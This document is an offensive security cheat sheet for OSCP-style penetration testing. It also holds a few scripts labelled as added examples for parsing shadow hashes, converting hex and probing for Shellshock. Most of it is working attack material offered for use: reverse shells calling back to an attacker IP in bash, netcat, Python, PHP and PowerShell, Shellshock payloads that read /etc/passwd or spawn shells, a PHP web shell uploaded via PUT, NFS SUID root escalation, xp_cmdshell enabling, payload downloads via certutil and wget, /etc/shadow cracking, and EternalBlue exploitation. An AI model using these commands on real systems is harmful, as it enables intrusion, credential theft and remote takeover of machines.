Offensive Security Testing Guide


This cheat sheet is a compilation of commands we learnt while exploiting vulnerable machines.
The commands below may not be enough on their own to obtain the Offensive Security Certified Professional (OSCP) certification.
So... Try Harder!

Information Gathering

Operating System

Windows

Interesting Paths
"Documents and Settings"/Administrator/Desktop #profile location on XP / Server 2003

#XAMPP defaults, worth reading through an LFI or arbitrary-file-read bug
file:///C:/xampp/readme_en.txt
file:///C:/xampp/passwords.txt
file:///C:/xampp/webdav/webdav.txt
file:///C:/xampp/apache/conf/extra/httpd-dav.conf
file:///C:/xampp/apache/conf/extra/httpd-xampp.conf
file:///C:/xampp/apache/logs/access.log
file:///C:/xampp/apache/logs/error.log
file:///C:/xampp/security/webdav.htpasswd
file:///C:/xampp/htdocs/dashboard/phpinfo.php
file:///C:/xampp/phpmyadmin/config.inc.php
file:///C:/xampp/php/logs/php_error_log
file:///C:/xampp/mysql/bin/my.ini

C:\Users\<User>\AppData\Local\Temp

#Outlook data files (.pst/.ost): email addresses and message contents
C:\Users\<User>\AppData\Local\Microsoft\Outlook

Active Connections
netstat -anob #-b shows the owning executable; requires elevation
netstat -ano #without elevation; map the PID column to a process with tasklist
tasklist

User or System Enumeration
echo %username%

Shell to Meterpreter Upgrade
use post/multi/manage/shell_to_meterpreter #Metasploit post module; upgrades an existing shell session

Linux

Identify OS
uname -a
cat /etc/lsb-release

Exploring Directories
ls *
ls -R <path> #list the directory tree recursively
ls -la * #long format, including hidden files

Identify Filetype
file <filename>

File Compression/Decompression
tar xvf <filename>

Retrieve Password Hashes
cat /etc/shadow | grep '\$' | cut -d ':' -f -2 #needs root (or a file-read bug); prints user:hash for accounts that have a hash

Execute a Command 10 Times
for i in {1..10}; do whoami; done

Steganography

binwalk -e <picture_file>
exiftool <picture_file>
steghide extract -sf <picture_file>

Web Application Request Parameter

wfuzz -c -z file,burp-parameter-names.txt --hh=19 http://<target_URL>/<page>?FUZZ=test #--hh=19 hides responses whose body is 19 chars (the baseline); adjust to the target
Reference:
http://wfuzz.readthedocs.io/en/latest/user/basicusage.html#fuzzing-parameters-in-urls
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/burp-parameter-names.txt

Web Application Directories

cewl <target URL> > wordlist.txt #scrape the site's own words into a wordlist for directory or password guessing

Web Application Sensitive Page

Apache

/etc/apache2/sites-enabled/000-default.conf

WordPress

/wp-config.php

Mail Server

POP3 (commands typed after connecting to TCP port 110)

USER <username>
PASS <password>
LIST #displays a summary of messages
RETR <message_number> #retrieve a particular message

Hash & Encryption

Identify Hash

hash-identifier

Cracking Hash

hashcat64.exe --force -m 1400 -a 0 <hash_file> <dictionary_file> #-m 1400 = SHA-256, -a 0 = straight dictionary attack, --force ignores warnings
john <hash_file> --format=mysql-sha1 --wordlist=<dictionary_file>
john <hash_file> --format=raw-sha1 --wordlist=<dictionary_file>
Tools
https://github.com/UltimateHackers/Hash-Buster
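The "Retrieve Password Hashes" one-liner and the "Identify Hash" / "Cracking Hash" steps above are usually done together: split the shadow file, drop the accounts that cannot be cracked, and pick the hashcat mode or john format from the hash prefix. The script below is an added example, not part of the original cheat sheet; the shadow lines it processes are constructed and the hash bodies are placeholders.

```shell
#!/bin/sh
# Added example, not from the original cheat sheet: take /etc/shadow lines
# (here a constructed sample), keep only the accounts that have a crackable
# hash, and name the crypt(3) scheme from the "$id$" prefix so the right
# hashcat -m / john --format can be picked before cracking.
# On a real target you need root or an arbitrary-file-read bug to get the file.

# Constructed sample; the hash bodies are placeholders, not real hashes.
SAMPLE_SHADOW='root:$6$saltsalt$PLACEHOLDERsha512cryptHASHxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
www-data:*:19000:0:99999:7:::
alice:$1$saltsalt$PLACEHOLDERmd5cryptHASH:19000:0:99999:7:::
bob:$5$saltsalt$PLACEHOLDERsha256cryptHASHxxxxxxxxxxxxxxxxx:19000:0:99999:7:::
carol:!$6$saltsalt$LOCKEDaccountHASHxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:19000:0:99999:7:::
dave::19000:0:99999:7:::
eve:$y$j9T$saltsaltsaltsalt$PLACEHOLDERyescryptHASHxxxxxxxxxxxxxxxxxxxx:19000:0:99999:7:::'

# Print "user:hash" for each account whose password field holds a hash.
# Empty, "*", "!" and "!!" fields mean no password / locked; skip those.
shadow_crackable() {
    while IFS=: read -r user hash _rest; do
        case "$hash" in
            ''|'*'|'!'*) continue ;;
        esac
        printf '%s:%s\n' "$user" "$hash"
    done
}

# Map a single hash field to its scheme and the cracking-tool options.
shadow_hash_type() {
    case "$1" in
        '$1$'*)  echo 'md5crypt: hashcat -m 500, john --format=md5crypt' ;;
        '$5$'*)  echo 'sha256crypt: hashcat -m 7400, john --format=sha256crypt' ;;
        '$6$'*)  echo 'sha512crypt: hashcat -m 1800, john --format=sha512crypt' ;;
        '$2a$'*|'$2b$'*|'$2y$'*) echo 'bcrypt: hashcat -m 3200, john --format=bcrypt' ;;
        '$y$'*)  echo 'yescrypt: john --format=crypt (uses the system libxcrypt)' ;;
        *)       echo 'unknown: run hash-identifier / check hashcat --example-hashes' ;;
    esac
}

# Report: one line per crackable account, scheme first, so it is obvious
# when a single john/hashcat run cannot cover the whole file.
shadow_report() {
    shadow_crackable | while IFS=: read -r user hash; do
        printf '%-10s %s\n' "$user" "$(shadow_hash_type "$hash")"
    done
}

printf '%s\n' "$SAMPLE_SHADOW" | shadow_report
```

Feed a real file with `shadow_report < /etc/shadow`; the user:hash lines from `shadow_crackable` can be written straight to a file for `john` or `hashcat`.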

Dictionary Attack

SSH
hydra -L <user_dict> -P <pwd_dict> <victim_ip_addr> ssh

Cracking ZIP

fcrackzip -u -D -p <dictionary_file> <zip_file>

RSA Attack

RsaCtfTool.py --publickey <decoder.pub> --uncipher <pass.crypt>
Reference:
https://github.com/Ganapati/RsaCtfTool

Decode Base64

base64 -d <<< <based_64_encoded_value>

Convert Hexadecimal to Text

echo <hexadecimal_value> | xxd -r -p

Convert Decimal to Text (via Hexadecimal)

python -c "print format(<decimal_value>, 'x').decode('hex')" #Python 2 only: format() gives the hex string, .decode('hex') turns it into raw bytes
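The Python 2 one-liner above no longer runs on a Python 3 target, and `xxd` is not always installed. As an added example (not from the original page) here are the same three conversions written with only `printf`, `od` and `tr`, so they work in a bare POSIX shell; the odd-length case that `printf '%x'` can produce is handled.

```shell
#!/bin/sh
# Added example, not from the original page: portable replacements for the
# Python 2 one-liner above.  dec2text turns a decimal-encoded value into
# text by way of its hex form; hex2text and text2hex cover the xxd / od
# round trip.  Only printf, od and tr are used, so it works without Python
# or xxd on a minimal target.

# "48656c6c6f" -> "Hello".  Accepts upper/lower case and odd-length input
# (a leading zero is added, as printf '%x' can yield an odd digit count).
hex2text() {
    hex=$(printf '%s' "$1" | tr -d ' \n')
    case "$hex" in
        *[!0-9a-fA-F]*|'') echo "hex2text: not a hex string: $1" >&2; return 1 ;;
    esac
    if [ $(( ${#hex} % 2 )) -eq 1 ]; then
        hex="0$hex"
    fi
    while [ -n "$hex" ]; do
        byte=$(printf '%.2s' "$hex")      # first two hex digits
        hex=${hex#??}
        # print the byte through an octal escape so '%' and '\' stay literal
        printf "\\$(printf '%03o' "$((0x$byte))")"
    done
}

# Decimal integer -> hex -> text, e.g. 1751477356 -> "hell"
dec2text() {
    hex2text "$(printf '%x' "$1")"
}

# "Hello" -> "48656c6c6f" (the reverse direction, for building payloads)
text2hex() {
    printf '%s' "$1" | od -An -tx1 | tr -d ' \n'
}

hex2text 48656c6c6f; echo
dec2text 1751477356; echo
text2hex Hello; echo
```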

Thick Client Application

Executable File

strings <executable_file>

Disassemble Java Class File

javap -c <java_class>.class | tee <output_file>.txt



Establishing a Connection

Listener (Attacker)

nc -nvlp 8099
nc -nvlp 8099 -u #UDP

Request (Victim, connecting back to the attacker's listener)

/bin/nc -e /bin/sh <attacker_ip> 8099 #-e needs a netcat build that supports it (e.g. netcat-traditional)
nc -e /bin/bash <attacker_ip> 8099
bash -i >& /dev/tcp/<attacker_ip>/8099 0>&1 #no netcat needed, bash only

Reference:
Exploitation using Shell

SSH

ssh -i <rsa_private_key_file>.key <user>@<target_IP_address>

SSH (IPv6)

ssh -6 -i <rsa_private_key_file>.key <user>@<target_IP_address>

RDP

rdesktop -u <username> -p <password> <target_ip_address>

Python

python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('<listener_ip>',8099));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);"

Database

MSSQL

sqsh -S <target_IP_address> -U <username>

MySQL

mysql -h <target_IP_address> -u <username> -p

Application

WebDav

cadaver http://<target_ip>/<webdav_path>/
put <webshell> #needs PUT allowed on the share; then request /<webdav_path>/<webshell> to run it

Shellshock

#Probe: a vulnerable CGI script returns "vulnerable" in the response body
wget -U "() { test;};echo \"Content-type: text/plain\"; echo; /bin/bash -c 'echo vulnerable'" http://<target_ip_address>/cgi-bin/<vulnerable>.cgi
#Reverse shell through the same header (listener on <listener_ip>:8099)
wget -U "() { test;};echo \"Content-type: text/plain\"; echo; /bin/bash -i >& /dev/tcp/<listener_ip>/8099 0>&1" http://<target_ip_address>/cgi-bin/<vulnerable>.cgi
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://<target_ip_address>/cgi-bin/<vulnerable>.sh
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/<listener_ip>/8099 0>&1'" http://<target_ip_address>/cgi-bin/<vulnerable>
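The wget/curl one-liners above pack the whole Shellshock (CVE-2014-6271) probe into one header. The script below, an added example that is not from the original page, splits it into a header builder, a remote probe that looks for a unique marker in the body rather than eyeballing the output, and the standard local check for the bash on a host you already have a shell on. `<target_url>` is an assumed placeholder.

```shell
#!/bin/sh
# Added example, not from the original page: the Shellshock
# (CVE-2014-6271) probe behind the wget/curl one-liners above, split so the
# header can be inspected before it is sent, plus the standard local check.
# <target_url> is an assumed placeholder for a CGI script on the target.

# Build the User-Agent value.  A vulnerable bash imports the exported
# function "() { :; }" and keeps executing what follows it; the two "echo"
# emit the blank line that ends the CGI headers so the output is not a 500.
shellshock_header() {
    printf "() { :; }; echo; echo; /bin/bash -c '%s'" "$1"
}

# Send the probe and look for the marker in the body.  Needs network reach
# to the target; usage: shellshock_probe http://<target_url>/cgi-bin/x.cgi
shellshock_probe() {
    url=$1
    marker="ss_$$"
    body=$(curl -s -m 10 -H "User-Agent: $(shellshock_header "echo $marker")" "$url")
    case "$body" in
        *"$marker"*) echo vulnerable ;;
        *) echo "not vulnerable (or the header never reaches bash)" ;;
    esac
}

# Local check of the bash on this host (e.g. from a shell you already have).
# Patched bash prints only "test"; a vulnerable one also prints "vulnerable".
shellshock_local_check() {
    command -v bash >/dev/null 2>&1 || { echo "no bash"; return 2; }
    out=$(env x='() { :;}; echo vulnerable' bash -c 'echo test' 2>/dev/null)
    case "$out" in
        *vulnerable*) echo vulnerable ;;
        *) echo patched ;;
    esac
}

echo "header: $(shellshock_header id)"
echo "local bash: $(shellshock_local_check)"
```

Once `shellshock_probe` reports vulnerable, the same `shellshock_header` call with the reverse-shell command from the curl line above as its argument gives the callback to the listener on port 8099.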

Proxy

SSH

proxytunnel -p <victim_ip_addr>:<port> -d 127.0.0.1:22 -a 8099 #-p HTTP proxy on the victim, -d destination as seen from the proxy, -a local listen port
ssh <user>@127.0.0.1 -p 8099 "/bin/sh"



File/Content Transfer

Linux

wget http://<attacker_ip>/<file> -O /<path>/<filename> 2>&1
wget --no-check-certificate https://<attacker_ip>/<file>
curl -O http://<attacker_ip>/<file> 2>&1
fetch -o <filename> http://<attacker_ip>/<file>

FTP

Set the transfer mode to BINARY before moving non-ASCII files (ftp client command)
binary
Browse directories and retrieve a file (raw protocol commands, as typed over nc/telnet)
LIST C:\\<Directory Name>
RETR C:\\<Directory Name>\\<File Name>

Netcat

Victim
nc <attacker_ip_address> 8099 < <file>.txt
Attacker
nc -lnvp 8099 > <file>.txt

HTTP PUT Method

curl -v -X PUT -d '<?php system ($_GET["cmd"]); ?>' http://<target_ip_addr>/<path>/shell.php

NFS (privilege escalation via a share exported with no_root_squash)

#On the attacker, as root, with the share mounted on /mnt/<share>
cp /bin/bash /mnt/<share>
chmod 4777 /mnt/<share>/bash
#On the victim, from the share's local mount point
./bash -p #-p keeps the SUID effective uid (root)

Powershell

C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe wget "http://<attacker_ip>/<file>" -outfile "<output_file_name>"
powershell -command "(New-Object System.Net.WebClient).DownloadFile('http://<attacker_ip>/<file>', '<output_file_name>')"
powershell -command "Invoke-WebRequest 'http://<attacker_ip>/<file>' -OutFile '<output_file_name>'"

Certutil

certutil -urlcache -split -f http://<attacker_ip>/<file> <output_file_name>



Code Execution

Python

import os
import subprocess

print(subprocess.check_output(['whoami'])) #confirm code execution first
os.system('nc -e /bin/bash <attacker_ip> 8099') #then call back to the listener

PHP

<?php passthru("rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc <attacker_ip_address> 8099 > /tmp/f"); ?>

MS SQL

#Enable xp_cmdshell (needs the sysadmin role), then run a binary already dropped on the host
EXEC SP_CONFIGURE N'show advanced options', 1
go
EXEC SP_CONFIGURE N'xp_cmdshell', 1
go
RECONFIGURE
go
xp_cmdshell 'cd C:\<path_to_bind_shell>\ & <bind_shell_name>.exe';
go

Oracle iSQL*Plus

#Grant the Java file/runtime permissions (needs DBA-level rights), then call javacmd, a custom Java stored procedure that must be created beforehand (not an Oracle built-in)
exec dbms_java.grant_permission( 'SYSTEM','SYS:java.io.FilePermission', '<<ALL FILES>>', 'execute');

begin
  dbms_java.grant_permission
      ('SYSTEM',
       'java.io.FilePermission',
       '<<ALL FILES>>',
       'execute');
  dbms_java.grant_permission
      ('SYSTEM',
       'java.lang.RuntimePermission',
       '*',
       'writeFileDescriptor' );
end;

exec javacmd('<command>');

PowerShell

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<listener_ip>',8099);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Reference:
Reverse Shell Cheat Sheet | pentestmonkey



TTY Shell

Python

which python
which bash
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'

Perl

/usr/bin/perl -e 'exec "/bin/sh"'

VIM

:set shell=/bin/bash
:shell

AWK

awk 'BEGIN {system("/bin/sh")}'

Reference:
NETSEC - Spawning a TTY Shell
SANS Penetration Testing | Escaping Restricted Linux Shells



Buffer Overflow

Reference:
http://www.axcelsec.com/2018/05/buffer-overflow.html



Remote Code Execution (Windows)

MS17-010 (EternalBlue)
nasm -f bin eternalblue_kshellcode_x86.asm #assembles the kernel shellcode stub to eternalblue_kshellcode_x86
msfvenom -p windows/meterpreter/reverse_tcp -f raw -o msf.bin EXITFUNC=thread LHOST=<Local IP> LPORT=8099
cat eternalblue_kshellcode_x86 msf.bin > sc_x86.bin #kernel stub followed by the user-mode payload
python eternalblue_exploit7.py <Target IP> shellcode/sc_x86.bin #exploit7 = Windows 7 / Server 2008 R2; match the shellcode architecture to the target
Reference:
https://github.com/vivami/MS17-010


Post Exploitation

Reference:
https://www.axcelsec.com/2019/05/post-exploitation.html
